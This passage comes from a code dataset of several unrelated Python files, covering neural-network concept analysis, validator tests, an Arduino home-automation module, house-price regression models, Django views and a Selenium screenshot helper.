self.metric = metric\n self.weights = weights_pth\n self.nclasses = nclasses\n self.model.load_weights(self.weights, by_name = True)\n\n\n def _get_layer_idx(self, 
layer_name):\n \"\"\"\n \"\"\"\n for idx, layer in enumerate(self.model.layers):\n if layer.name == layer_name:\n return idx\n\n def save_concepts(self, img, concepts, nrows, ncols, name, save_path=None):\n \"\"\"\n creates a grid of images and saves it if a path is given\n\n img : test image\n concepts: all features vectors\n nrows : number of rows in an image\n ncols : number of columns in an image\n save_path : path to save an image\n \"\"\"\n\n plt.figure(figsize=(5, 5))\n gs = gridspec.GridSpec(nrows, ncols)\n gs.update(wspace=0.025, hspace=0.05)\n \n for i in range(nrows):\n for j in range(ncols):\n try:\n concept = concepts[:,:,i*nrows +(j)]\n ax = plt.subplot(gs[i, j])\n im = ax.imshow(np.squeeze(img), cmap='gray')\n im = ax.imshow(concept, cmap = get_transparent_cmap('hot_r'), vmin = 0, vmax = 3)\n ax.set_xticklabels([])\n ax.set_yticklabels([])\n ax.set_aspect('equal')\n ax.tick_params(bottom='off', top='off', labelbottom='off' )\n except:\n pass\n \n if save_path:\n if not os.path.exists(save_path): \n os.makedirs(save_path)\n plt.savefig(os.path.join(save_path, name+'.png'), bbox_inches='tight')\n else:\n plt.show()\n\n def identify(self, concept_info, \n dataset_path, \n save_path, \n loader,\n test_img,\n img_ROI = None):\n \"\"\"\n tests the significance of each concept\n\n concept: {'concept_name', 'layer_name', 'filter_idxs'}\n dataset_path: \n save_path:\n loader:\n test_imgs:\n img_ROI:\n \"\"\"\n layer_name = concept_info['layer_name'] \n self.dissector = Dissector(self.model, layer_name)\n\n threshold_maps = self.dissector.get_threshold_maps(dataset_path, save_path, percentile = 85, loader=loader)\n\n concepts = self.dissector.apply_threshold(test_img, threshold_maps,\n post_process_threshold = 80,\n ROI=img_ROI)\n\n node_idxs = concept_info['filter_idxs']\n concepts = concepts[:, :, node_idxs]\n\n if save_path:\n nrows = int(len(node_idxs)**.5) + 1\n self.save_concepts(test_img, concepts, nrows, nrows, concept_info['concept_name'], save_path = save_path)\n\n # some statistics on concepts\n mean_concept = np.round(np.mean(concepts, axis=2)[:,:,None])\n self.save_concepts(test_img, mean_concept, 1, 1, concept_info['concept_name']+'mean', save_path = save_path)\n\n return concepts\n\n def get_layer_idx(self, layer_name):\n for idx, layer in enumerate(self.model.layers):\n if layer.name == layer_name:\n return idx\n\n def flow_based_identifier(self, concept_info, \n save_path, \n test_img,\n base_grad=False):\n \"\"\"\n tests the significance of each concept\n\n concept: {'concept_name', 'layer_name', 'filter_idxs'}\n dataset_path: \n save_path:\n loader:\n test_imgs:\n \"\"\"\n layer_name = concept_info['layer_name'] \n node_idxs = concept_info['filter_idxs']\n\n self.model.load_weights(self.weights, by_name = True)\n node_idx = self.get_layer_idx(concept_info['layer_name'])\n total_filters = np.arange(np.array(self.model.layers[node_idx].get_weights())[0].shape[-1])\n test_filters = np.delete(total_filters, node_idxs)\n\n if base_grad == False:\n occluded_weights = deepcopy(np.array(self.model.layers[node_idx].get_weights()))\n for j in test_filters:\n occluded_weights[0][:,:,:,j] = 0\n try:\n occluded_weights[1][j] = 0\n except: pass\n\n\n self.model.layers[node_idx].set_weights(occluded_weights)\n\n features = self.model.get_layer(concept_info['layer_name']).output\n exp_features = layers.Conv2D(1,1, name='Expectation')(features)\n model = Model(inputs = self.model.input, outputs=exp_features)\n\n # print (model.summary())\n # for ii in range(len(self.model.layers)):\n # 
newmodel.layers[ii].set_weights(self.model.layers[ii].get_weights())\n model.layers[-1].set_weights((np.ones((1, 1, len(total_filters), 1)), np.ones(1)))\n\n grad = singlelayercam(model, test_img, \n nclasses = 1, \n save_path = save_path, \n name = concept_info['concept_name'], \n st_layer_idx = -1, \n end_layer_idx = 1 if (len(model.layers) -3) < 0 else -3,\n threshold = 0.5)\n print (\"[INFO: BioExp Concept Identification] Identified Concept {} in layer {}\".format(concept_info['concept_name'], layer_name))\n\n del model\n return grad[0]\n\n\n def _gaussian_sampler_(self, data, size, ax=-1):\n shape = np.mean(data, ax).shape + (size,)\n return lambda: np.std(data, -1)[..., None] * np.random.randn(*list(shape)) + np.mean(data, -1)[..., None] \n # return lambda: np.random.normal(np.mean(data, -1)[..., None], np.std(data, -1)[..., None], size = shape)\n\n\n def _uniform_sampler_(self, data, size, ax=-1):\n shape = np.mean(data, ax).shape + (size,)\n return lambda: np.percentile(data, 10, axis=-1)[..., None] * np.random.rand(*list(shape)) + np.percentile(data, 90, axis=-1)[..., None]\n # return lambda: np.random.uniform(np.percentile(data, 10, axis=-1)[..., None], np.percentile(data, 90, axis=-1)[..., None], size = shape)\n\n\n def concept_distribution(self, concept_info, prior='gaussian'):\n r\"\"\"\n concept_info: {'concept_name', \n 'layer_name', \n 'filter_idxs'}\n\n return: weight_sampler, bias_sampler\n \"\"\"\n\n layer_name = concept_info['layer_name'] \n node_idxs = concept_info['filter_idxs']\n\n self.model.load_weights(self.weights, by_name = True)\n node_idx = self.get_layer_idx(concept_info['layer_name'])\n\n layer_weights = deepcopy(np.array(self.model.layers[node_idx].get_weights()))\n concept_weights = layer_weights[0][:,:,:, node_idxs]\n\n if prior == 'gaussian':\n try:\n concept_biases = layer_weights[1][node_idxs]\n return (self._gaussian_sampler_(concept_weights, len(node_idxs)), self._gaussian_sampler_(concept_biases, len(node_idxs)))\n except:\n return (self._gaussian_sampler_(concept_weights, len(node_idxs)))\n elif prior == 'uniform':\n try:\n concept_biases = layer_weights[1][node_idxs]\n return (self._uniform_sampler_(concept_weights, len(node_idxs)), self._uniform_sampler_(concept_biases, len(node_idxs)))\n except: \n return (self._uniform_sampler_(concept_weights, len(node_idxs)))\n else:\n raise NotImplementedError(\"Allowed Priors are ['gaussian', 'uniform']\")\n\n\n def concept_robustness(self, concept_info,\n test_img,\n nmontecarlo = 3,\n base = False,\n prior = 'gaussian',\n compare = False):\n r\"\"\"\n tests the significance of each concept\n\n concept: {'concept_name', \n 'layer_name', \n 'filter_idxs'}\n dataset_path: \n save_path:\n loader:\n test_imgs:\n img_ROI:\n \"\"\"\n layer_name = concept_info['layer_name'] \n node_idxs = concept_info['filter_idxs']\n\n self.model.load_weights(self.weights, by_name = True)\n node_idx = self.get_layer_idx(concept_info['layer_name'])\n selected_weights = deepcopy(np.array(self.model.layers[node_idx].get_weights()))\n\n total_filters = np.arange(selected_weights[0].shape[-1])\n test_filters = np.delete(total_filters, node_idxs)\n\n occluded_weights = deepcopy(selected_weights)\n\n if compare: \n true_prediction = self.model.predict(test_img[None, ...])\n delta_scores = []\n\n # weight occlusion\n for j in test_filters:\n occluded_weights[0][:,:,:,j] = 0\n try: occluded_weights[1][j] = 0\n except: pass\n\n filter_idxs = node_idxs if not base else total_filters\n\n # sampler defn\n if prior == 'gaussian':\n weight_sampler 
= self._gaussian_sampler_(selected_weights[0][:, :, :, filter_idxs], len(node_idxs)) \n try: bias_sampler = self._gaussian_sampler_(selected_weights[1][filter_idxs], len(node_idxs))\n except: pass\n elif prior == 'uniform':\n weight_sampler = self._uniform_sampler_(selected_weights[0][:, :, :, filter_idxs], len(node_idxs)) \n try: bias_sampler = self._uniform_sampler_(selected_weights[1][filter_idxs], len(node_idxs))\n except: pass\n else:\n raise NotImplementedError(\"Allowed Priors are ['gaussian', 'uniform']\")\n \n\n # robustness\n gradlist = []\n\n for _ in range(nmontecarlo):\n occluded_weights[0][:,:,:,node_idxs] = weight_sampler()\n try: occluded_weights[1][node_idxs] = bias_sampler()\n except: pass\n\n self.model.layers[node_idx].set_weights(occluded_weights)\n if compare: \n occluded_prediction = self.model.predict(test_img[None, ...])\n delta_scores.append(np.mean((true_prediction - occluded_prediction)**2))\n\n\n features = self.model.get_layer(concept_info['layer_name']).output\n exp_features = layers.Conv2D(1, 1, name='Expectation')(features)\n model = Model(inputs = self.model.input, outputs=exp_features)\n model.layers[-1].set_weights((np.ones((1, 1, len(total_filters), 1)), np.ones(1)))\n\n nclass_grad = singlelayercam(model, test_img, \n nclasses = 1, \n name = concept_info['concept_name'], \n st_layer_idx = -1, \n end_layer_idx = 1 if (len(model.layers) -3 < 0) else -3,\n threshold = 0.5)\n gradlist.append(nclass_grad[0])\n \n try: del bias_sampler\n except: pass \n del model, weight_sampler\n\n if compare:\n return np.array(gradlist), np.mean(delta_scores)\n return np.array(gradlist)\n\n\n def check_robustness(self, concept_info,\n save_path, \n test_img,\n save_all = False,\n nmontecarlo = 4,\n base = False,\n compare = False,\n prior = 'gaussian'):\n\n actual_grad = self.flow_based_identifier(concept_info,\n save_path = None,\n test_img = test_img)\n montecarlo_grad = self.concept_robustness(concept_info,\n test_img,\n nmontecarlo=nmontecarlo,\n base = base,\n compare = compare,\n prior = prior)\n if compare:\n score = montecarlo_grad[1]\n montecarlo_grad = montecarlo_grad[0]\n print (\"[INFO: BioExp Concept Robustness] Difference in Score {}\".format(score))\n\n if save_path:\n plt.clf()\n if save_all:\n plt.figure(figsize=(5*(nmontecarlo + 2), 5))\n gs = gridspec.GridSpec(1, nmontecarlo + 2)\n gs.update(wspace=0.025, hspace=0.05)\n\n ax = plt.subplot(gs[0])\n im = ax.imshow(np.squeeze(test_img), cmap='gray', vmin=0, vmax=1)\n im = ax.imshow(actual_grad, cmap=get_transparent_cmap('Greens'), vmin=0, vmax=1)\n ax.set_xticklabels([])\n ax.set_yticklabels([])\n ax.set_aspect('equal')\n ax.set_title('actual')\n ax.tick_params(bottom='off', top='off', labelbottom='off' )\n \n for ii in range(nmontecarlo):\n if ii == (nmontecarlo - 1): ax = plt.subplot(gs[ii + 1: ])\n else: ax = plt.subplot(gs[ii + 1])\n im = ax.imshow(np.squeeze(test_img), cmap='gray', vmin=0, vmax=1)\n im = ax.imshow(montecarlo_grad[ii], cmap=get_transparent_cmap('Greens'), vmin=0, vmax=1)\n ax.set_xticklabels([])\n ax.set_yticklabels([])\n ax.set_aspect('equal')\n ax.set_title('sampled')\n ax.tick_params(bottom='off', top='off', labelbottom='off')\n else:\n plt.figure(figsize=(5*(3), 5))\n gs = gridspec.GridSpec(1, 3)\n gs.update(wspace=0.025, hspace=0.05)\n\n ax = plt.subplot(gs[0])\n im = ax.imshow(np.squeeze(test_img), cmap='gray', vmin=0, vmax=1)\n im = ax.imshow(actual_grad, cmap=get_transparent_cmap('Greens'), vmin=0, vmax=1)\n ax.set_xticklabels([])\n ax.set_yticklabels([])\n 
ax.set_aspect('equal')\n ax.set_title('actual')\n ax.tick_params(bottom='off', top='off', labelbottom='off' )\n \n ax = plt.subplot(gs[1:])\n im = ax.imshow(np.squeeze(test_img), cmap='gray', vmin=0, vmax=1)\n im = ax.imshow(np.mean(montecarlo_grad, axis=0), cmap=get_transparent_cmap('Greens'), vmin=0, vmax=1)\n ax.set_xticklabels([])\n ax.set_yticklabels([])\n ax.set_aspect('equal')\n ax.set_title('actual')\n ax.tick_params(bottom='off', top='off', labelbottom='off' )\n\n divider = make_axes_locatable(ax)\n cax = divider.append_axes(\"right\", size=\"5%\", pad=0.2)\n cb = plt.colorbar(im, ax=ax, cax=cax )\n os.makedirs(save_path, exist_ok = True)\n plt.savefig(os.path.join(save_path, concept_info['concept_name'] +'_{}_{}_robustness.png'.format('base' if base else 'cluster', prior)), bbox_inches='tight')\n \n return np.mean(montecarlo_grad, axis=0)\n","repo_name":"koriavinash1/BioExp","sub_path":"BioExp/clusters/concept.py","file_name":"concept.py","file_ext":"py","file_size_in_byte":16487,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"95"} +{"seq_id":"1810996652","text":"from cerberus import Validator\n\ndto_schema = dict(\n img=dict(\n type='string',\n empty=False,\n ),\n name=dict(\n type='string',\n ),\n)\n\n\ndef test_empty_doc_is_success():\n document = {}\n assert Validator(dto_schema).validate(document)\n\n\ndef test_unknown_field_make_fail():\n document = {\n \"k\": \"i1\",\n }\n v = Validator()\n assert not v.validate(document, dto_schema)\n assert str(v.errors) == \"{'k': ['unknown field']}\"\n\n\ndef test_allow_unknown():\n document = {\n \"k\": \"i1\",\n }\n v = Validator()\n v.allow_unknown = True\n assert v.validate(document, dto_schema)\n\n\ndef test_empty_not_allowed():\n document = {\n \"img\": \"\",\n }\n v = Validator()\n assert not v.validate(document, dto_schema)\n assert str(v.errors) == \"{'img': ['empty values not allowed']}\"\n\n\ndef test_empty_allowed():\n document = {\n \"img\": \"x\",\n \"name\": \"\",\n }\n v = Validator()\n assert v.validate(document, dto_schema)\n\n\ndef test_root_list():\n schema = dict()\n document = [1, 2, 3]\n v = Validator(schema)\n assert v.validate(document)\n","repo_name":"ddqus/learn-python-using-tdd","sub_path":"test/external/cerberus/test_basic.py","file_name":"test_basic.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"5050542189","text":"from nltk.tag import pos_tag\r\nimport re\r\nimport nltk\r\n\r\ndef tokenize_sentence(sentence):\r\n return re.findall(r\"[\\w']+|[.,!+?;]+\", sentence)\r\n\r\nsentence = \"AAPL refuses maintenance, to working woman\"\r\ntagged_sent = pos_tag(tokenize_sentence(sentence))\r\nprint(tagged_sent)\r\n# [('Michael', 'NNP'), ('Jackson', 'NNP'), ('likes', 'VBZ'), ('to', 'TO'), ('eat', 'VB'), ('at', 'IN'), ('McDonalds', 'NNP')]\r\n\r\npropernouns = [word for word,pos in tagged_sent if pos == 'NNP']\r\nprint(propernouns)\r\n# ['Michael','Jackson', 'McDonalds']\r\n\r\nprint(nltk.help.upenn_tagset())\r\n\r\n# [('Michael', 'NNP'), ('Jackson', 'NNP'), ('likes', 'VBZ'), ('to', 'TO'), ('eat', 'VB'), ('at', 'IN'), ('McDonalds.', 'NNP'), ('How', 'NNP'), ('are', 'VBP'), ('you', 'PRP'), ('doing?', 'VBP')]\r\n\r\n#\r\nindex = 0\r\n","repo_name":"raiprabh/analytics","sub_path":"DataCleaning/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} 
+{"seq_id":"14839618829","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n# Title: model.py\n# Author: Romain Gigault\n# Date: 17-Sept-2014\n# Info: Interface for light\nimport serial, time, threading, select\nfrom media.andro.manager import AndroManager\n\nclass ArduinoModel():\n \"\"\"Create a Arduino object for remote control.\"\"\"\n\n def __init__(self,port):\n self.port = port\n self.iface = serial.Serial(port, 9600, timeout=0.1)\n time.sleep(1)\n\n def __exit__(self):\n self.iface.close()\n\n def switch_status(self,device, on_off):\n error = False\n if device != 'bedRoom' and device != 'livingRoom':\n return 'bad device'\n if on_off == 'on':\n if device == 'bedRoom':\n self.iface.write('1')\n elif device == 'livingRoom':\n self.iface.write('3')\n elif on_off == 'off':\n if device == 'bedRoom':\n self.iface.write('0')\n elif device == 'livingRoom':\n self.iface.write('2')\n else:\n error = True\n if error:\n return \"NOK\"\n else:\n return \"OK\"\n\nclass ArduinoThread(threading.Thread):\n \"\"\"Thread class with a stop() method. The thread itself has to check\n regularly for the stopped() condition.\"\"\"\n def __init__(self, iface_address, timer):\n super(ArduinoThread, self).__init__()\n self._stop = threading.Event()\n self.setDaemon = True\n self.anybody_home = False\n self.iface_address = iface_address\n self.timer = timer\n self.last_detected = 0 #Initialize last_detected\n self.last_message_sent = 0 \n day_str = time.strftime(\"%d-%b-%Y\",time.localtime())\n self.sunrise = time.strptime(day_str + \" 08:00\", \"%d-%b-%Y %H:%M\")\n self.sunset = time.strptime(day_str + \" 20:00\", \"%d-%b-%Y %H:%M\")\n self.start()\n\n def stop(self):\n self._stop.set()\n\n def stopped(self):\n return self._stop.isSet()\n\n def run(self):\n arduino_serial = serial.Serial(self.iface_address, 9600, timeout=0.1)\n time.sleep(1)\n as_read,_,_ = select.select([arduino_serial],[],[],7)\n light_triggered = False\n while 1:\n try:\n data = as_read[0].readline()\n except:\n #if programs falls here, it means that did not return the serial link, try to bound it again\n data = ''\n as_read,_,_ = select.select([arduino_serial],[],[],7)\n #print(\"Trying to bound again with Serial\")\n pass\n if data != '':\n self.anybody_home = True\n self.last_detected = time.time()\n else:\n #Clear the flag to avoid getting old notification \n self.anybody_home = False\n #print(\"Someone detected at \" + time.strftime(\"%d-%b-%Y %H:%M\",time.localtime(self.last_detected)))\n if self.anybody_home:\n if (time.time() - self.last_message_sent > self.timer*60):#TODO correct this, it should send a signal when someone is detected and not wait the timer\n #print(\"Sending message to Andro...\")\n AndroManager().send_notification(title='Someone%20at%20home', text = \"Detected%20at%20\" + time.strftime(\"%d-%b-%Y---%H:%M\",time.localtime(self.last_detected)),id=\"sbdy_detected\",led_color=\"red\",led_on=\"5000\",led_off=\"2000\")\n self.anybody_home = False\n self.last_message_sent = time.time()\n self.last_detected = 0\n #if self.check_sunrise_sunset():\n # if not light_triggered:\n # #Trigger light and remember command\n # print (\"Triggering light...\")\n # ArduinoModel(self.iface_address).switch_status(\"livingRoom\",\"on\")\n # light_triggered = True\n #if light_triggered and (time.time() - self.last_detected > 1*60):\n # print (\"Killing light...\")\n # ArduinoModel(self.iface_address).switch_status(\"livingRoom\",\"off\")\n # light_triggered = False\n # self.anybody_home = False\n #TODO create a switch to avoid 
lightening up if it is not required\n\n #Exit the loop if thread was asked to stop\n if(self.stopped()):\n del(arduino_serial)\n return\n\n def update_timer(self):\n self.timer = time.time() #Get actual time\n\n def check_sunrise_sunset(self):\n now = time.localtime()\n #print(\"Sunrise : \" + time.strftime(\"%d-%b-%Y %H:%M\", self.sunrise))\n #print(\"Now : \" + time.strftime(\"%d-%b-%Y %H:%M\", now))\n #print(\"Sunset : \" + time.strftime(\"%d-%b-%Y %H:%M\", self.sunset))\n if(self.sunrise < now and now < self.sunset):\n return False\n else:\n return True\n\n def update_sun_times(self):\n #TODO write a parser to get sun time via a webservic\n return False","repo_name":"Romalouz/Automation","sub_path":"media/arduino/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5082,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"95"} +{"seq_id":"23560219622","text":"import sys\nfrom collections import deque\n\nread = sys.stdin.readline\n\n\ndef main():\n N = int(read().rstrip())\n Q = deque([1, 2, 3, 4, 5, 6, 7, 8, 9])\n res = [i for i in range(10)]\n\n # 한 자리 수이면 바로 출력하고 종료\n if N < 10:\n print(res[N])\n return\n\n # 큐가 빌 때까지 계속 반복\n while len(Q) != 0:\n if len(res) >= N + 1: # 0이 포함되어 있으므로 N번째를 구했으면 길이는 N + 1이 됨\n break\n\n x = Q.popleft()\n # 1의 자리보다 하나 작은 수 까지만 반복. 그래야 감소하는 수가 됨. 예를 들어 x가 96 이면 0~5까지만 붙을 수 있음\n for i in range(x % 10):\n # x가 96이면 960을 만든 후 i를 1의자리에 붙이면 감수하는 수가 됨.\n Q.append(x * 10 + i)\n res.append(x * 10 + i)\n\n # 감소하는 수 개수가 N 만큼 안나왔으면 불가능한 경우\n if len(res) < N + 1:\n print(-1)\n else:\n\n print(res[N])\n\n\nif __name__ == '__main__':\n main()","repo_name":"DONGWANKOH/Phthon_Study","sub_path":"d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"29000384217","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.model_selection import train_test_split\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense\nfrom tensorflow.keras.wrappers.scikit_learn import KerasRegressor\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.feature_selection import VarianceThreshold\nfrom tensorflow.keras import backend as K\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.metrics import mean_squared_log_error\nfrom Preprocessor import Preprocessor\nfrom sklearn.ensemble import RandomForestRegressor, GradientBoostingRegressor\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.linear_model import RidgeCV\nfrom sklearn.model_selection import RepeatedKFold\nimport xgboost\nimport lightgbm as lgbm\nfrom flaml import AutoML\nimport json\n\n\ndef root_mean_squared_log_error(y_true, y_pred):\n y_pred = np.abs(y_pred)\n return mean_squared_log_error(y_true, y_pred) ** 0.5\n\n\ndef custom_metric(X_test, y_test, estimator, labels, X_train, y_train,\n weight_test=None, weight_train=None, config=None, groups_test=None, groups_train=None):\n y_pred = estimator.predict(X_test)\n test_loss = root_mean_squared_log_error(y_test, y_pred)\n y_pred = estimator.predict(X_train)\n train_loss = root_mean_squared_log_error(y_train, y_pred)\n alpha = 0.5\n return test_loss * (1 + alpha) - alpha * train_loss, {}\n\n\nclass TestModel:\n\n def __init__(self, x_train, y_train):\n self.model = None\n self.x_train = x_train\n self.y_train = y_train\n\n \"\"\"\n 
This function is used just for showing that trying to predict the price based on the total area alone will\n not be good enough for an accurate prediction\n \"\"\"\n\n def predict_linearly(self, m, b, data):\n predictions = []\n for _, row in data.iterrows():\n price = m * row[\"area_total\"] + b\n if price < 0:\n price = 0\n predictions.append((int(row[\"id\"]), price))\n return pd.DataFrame(predictions, columns=[\"id\", \"price\"])\n\n \"\"\"\n Main function for training the model. Will use the dataset partition selected in the constructor to\n fit a KerasRegressor model. The trained model is bound to self.model.\n \"\"\"\n\n def fit(self):\n estimators = []\n estimators.append(('standardize', StandardScaler()))\n estimators.append(('selector', VarianceThreshold()))\n # Set paramters for Grid Search\n # param_grid = {'n_estimators': [200, 300, 400, 500, 600],\n # 'max_features': [0.1, 0.3, 0.6]\n # }\n # Initialise the random forest model\n #rf = RandomForestRegressor(n_jobs=-1, random_state=0, bootstrap=True)\n\n # Initialise Gridsearch CV with 5 fold corssvalidation and neggative root_mean_squared_error\n # tuned_rf = GridSearchCV(\n # estimator=rf, param_grid=param_grid, scoring='neg_root_mean_squared_error', cv=5, verbose=2)\n\n # rf = RandomForestRegressor(bootstrap=True,\n # max_depth=40,\n # max_features='auto',\n # min_samples_leaf=2,\n # min_samples_split=5,\n # n_estimators=100, verbose=2)\n #estimators.append(('rfr', rf))\n #gr = GradientBoostingRegressor(n_estimators=500, learning_rate=0.5)\n #estimators.append((\"gradient\", gr))\n params = {'n_estimators': 1168, 'num_leaves': 118, 'min_child_samples': 7, 'learning_rate': 0.08071528250529435,\n 'log_max_bin': 10, 'colsample_bytree': 0.662586923419352, 'reg_alpha': 0.0031039225181313645, 'reg_lambda': 0.05061507015311157}\n boost = xgboost.XGBRegressor(**params)\n estimators.append((\"boost\", boost))\n self.model = Pipeline(estimators)\n #self.model = rf\n return self.model.fit(self.x_train, self.y_train)\n #print(\"Best params:\", grid_search.best_params_)\n\n def keras_mlp_model(self, epochs=100, batch_size=10, verbose=0):\n estimators = []\n estimators.append(('standardize', StandardScaler()))\n estimators.append(('selector', VarianceThreshold()))\n estimators.append(('mlp', KerasRegressor(\n build_fn=self.generate_model, epochs=epochs, batch_size=batch_size, verbose=verbose)))\n return Pipeline(estimators)\n\n def randomforest_model(self):\n rf = RandomForestRegressor()\n return rf\n\n def xgboost_model(self, params = {},):\n boost = xgboost.XGBRegressor(**params)\n return boost\n\n def lgbm_model(self, params = {},):\n lightgbm = lgbm.LGBMRegressor(**params)\n return lightgbm\n\n def start_rf_search(self, params, load=False):\n if load:\n with open(\"rf_best.json\", \"r+\") as file:\n best = json.load(file)\n return RandomForestRegressor(**best)\n else:\n rf = RandomForestRegressor()\n finished = GridSearchCV(\n estimator=rf, param_grid=params, cv=3, verbose=2, n_jobs=-1)\n return finished\n\n def start_xgboost_search(self, params, load=False):\n if load:\n with open(\"boost_best.json\", \"r+\") as file:\n best = json.load(file)\n return xgboost.XGBRegressor(**best)\n else:\n boost = xgboost.XGBRegressor()\n finished = GridSearchCV(\n estimator=boost, param_grid=params, cv=3, verbose=2, n_jobs=-1)\n return finished\n\n def start_lgbm_search(self, params, load=False):\n if load:\n with open(\"lgbm_best.json\", \"r+\") as file:\n best = json.load(file)\n return lgbm.LGBMRegressor(**best)\n else:\n lg = 
lgbm.LGBMRegressor()\n finished = GridSearchCV(\n estimator=lg, param_grid=params, cv=3, verbose=2, n_jobs=-1)\n return finished\n\n def autoMLfit(self, x_train, y_train, estimator_list=[\"xgboost\", \"lgbm\", \"rf\"], time=10, metric=custom_metric, ensemble=False):\n automl_settings = {\n \"time_budget\": time, # in seconds\n \"metric\": metric,\n \"task\": 'regression',\n \"log_file_name\": \"lmaoxd.log\",\n \"estimator_list\": estimator_list,\n \"ensemble\": ensemble,\n }\n automl = AutoML()\n self.model = automl\n return self.model.fit(x_train, y_train, **automl_settings)\n\n def autoMLpredict(self, x_test):\n return self.model.predict(x_test)\n\n def autoML_print_best_model(self):\n print(\"best model\", self.model.best_estimator)\n print(\"configs\", self.model.best_config)\n\n \"\"\"\n Predicts the prices for the given data\n \"\"\"\n\n def predict(self, data):\n return self.model.predict(data)\n\n \"\"\"\n Returns a keras neural network model to be used for training and predictions\n \"\"\"\n\n def generate_model(self):\n model = tf.keras.models.Sequential()\n model.add(tf.keras.layers.Dense(\n units=64, activation=\"relu\"))\n model.add(tf.keras.layers.Dense(units=128, activation=\"relu\"))\n model.add(tf.keras.layers.Dense(units=128, activation=\"relu\"))\n model.add(tf.keras.layers.Dense(units=64, activation=\"relu\"))\n model.add(tf.keras.layers.Dense(units=1))\n model.compile(optimizer='adam', loss=self.loss)\n return model\n\n \"\"\"\n RMSLE (Root mean squared log error) - used as a loss function for the model\n \"\"\"\n\n def loss(self, y_true, y_pred):\n msle = tf.keras.losses.MeanSquaredLogarithmicError()\n return K.sqrt(msle(y_true, y_pred))\n\n \"\"\"\n Calculates the RMSLE over the whole prediction set\n \"\"\"\n\n def root_mean_squared_log_error(self, y_true, y_pred):\n return mean_squared_log_error(y_true, y_pred) ** 0.5\n\n \"\"\"\n Method used for saving the actual predictions to file\n \"\"\"\n\n def save_predictions(self, pred):\n zipped = [(23285+i, pred[i]) for i in range(len(pred))]\n result = pd.DataFrame(zipped, columns=[\"id\", \"price_prediction\"])\n result.to_csv(\"../results/predictions.csv\", index=False)\n return result\n\n\ndef main():\n preprocessor = Preprocessor()\n\n labels = preprocessor.apartments[\"price\"]\n merged = preprocessor.merged\n merged_test = preprocessor.merged_test\n\n training_data = preprocessor.preprocess(merged)\n training_data.drop(\"price\", 1, inplace=True)\n test_data = preprocessor.preprocess(merged_test)\n\n model = TestModel(training_data, labels)\n model.fit()\n\n test_pred = model.predict(model.x_test)\n test_labels = model.y_test.to_numpy()\n\n fig, ax = plt.subplots()\n ax.scatter(test_labels, test_pred)\n ax.plot([test_labels.min(), test_labels.max()], [\n test_labels.min(), test_labels.max()], 'k--', lw=4)\n ax.set_xlabel('Measured')\n ax.set_ylabel('Predicted')\n plt.show()\n\n res = pd.DataFrame([(test_labels[i], test_pred[i]) for i in range(\n len(test_pred))], columns=[\"actual\", \"prediction\"])\n print(\"RMLSE: %s\" % model.root_mean_squared_log_error(test_labels, test_pred))\n res.to_csv(\"split.csv\", index=False)\n\n pred = model.predict(test_data)\n model.save_predictions(pred)\n\n\n# main()\n","repo_name":"Olaussen/TDT4173_group69","sub_path":"src/TestModel.py","file_name":"TestModel.py","file_ext":"py","file_size_in_byte":9273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"15164557385","text":"from django.shortcuts import render, 
redirect\nfrom .models import *\n\ndef index(request):\n context = {\n 'courses': Course.objects.all()\n }\n return render(request, 'course.html', context)\n\ndef create(request):\n Course.objects.create(\n name = request.POST['name'],\n description = request.POST['description']\n )\n return redirect('/courses')\n\ndef show(request, id):\n if request.method == 'GET':\n context = {\n \"course\": Course.objects.get(id=id)\n }\n return render(request, 'destroy.html', context)\n\ndef destroy(request, id):\n if request.method == 'GET':\n context = {\n \"course\": Course.objects.get(id=id)\n }\n return render(request, 'destroy.html', context)\n\n if request.method == 'POST':\n courses = Course.objects.get(id=id)\n courses.delete() \n return redirect('/courses')\n\n","repo_name":"DrieuSpong/courses","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"41453585834","text":"\"\"\"Find Maximum and Minimum:\r\nDescription: Write a program to find the maximum and minimum numbers in a given list.\r\nExample:\r\nInput: [4, 9, 2, 7, 5]\r\nOutput: Maximum: 9, Minimum: 2\"\"\"\r\n\r\nlist= [4,9,2,7,5]\r\nmax_num=list[0]\r\nmin_num=list[0]\r\nfor num in list:\r\n if max_num 0:\n self.driver.execute_script(\n \"window.scrollBy(%d,%d)\" % (0, window_height)\n )\n screenshots.append(Image.open(BytesIO(self.driver.get_screenshot_as_png())))\n if not scroll:\n scroll_height = window_height\n break\n\n # Create final image\n stitched = Image.new(\"RGB\", (scroll_width, scroll_height))\n\n # Stitch images together\n for i, img in enumerate(screenshots):\n offset = i * window_height\n\n # Remove overlapping area from last screenshot\n if i > 0 and i == num - 1:\n overlap_height = img.height - scroll_height % img.height\n else:\n overlap_height = 0\n\n stitched.paste(img, (0, offset - overlap_height))\n\n stitched.save(os.path.join(self.image_path, name))\n\n self.scroll_top()\n\n def click(self, element=\"\", htmlid=None):\n \"\"\"Wrapper to scroll into element for click.\"\"\"\n if htmlid:\n element = self.driver.find_element(By.ID, htmlid)\n if isinstance(element, str):\n element = self.driver.find_element(By.LINK_TEXT, element)\n\n try:\n element.click()\n except ElementNotVisibleException:\n self.actions.move_to_element(element).perform()\n element.click()\n\n def clear_field(self, element):\n element.send_keys(Keys.CONTROL + \"a\")\n element.send_keys(Keys.DELETE)\n return element\n\n def do_login(self, create=True, 